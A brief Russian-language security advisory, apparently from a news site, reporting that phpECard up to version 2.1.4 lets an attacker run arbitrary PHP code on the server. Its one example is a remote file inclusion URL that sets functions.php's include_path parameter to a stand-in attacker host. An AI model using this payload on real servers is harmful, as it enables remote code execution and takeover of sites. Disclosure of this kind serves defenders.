Программа: phpECard <= 2.1.4

Нападающий может выполнить произвольный
PHP-код на сервере.

Пример:

http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?



Оставить мнение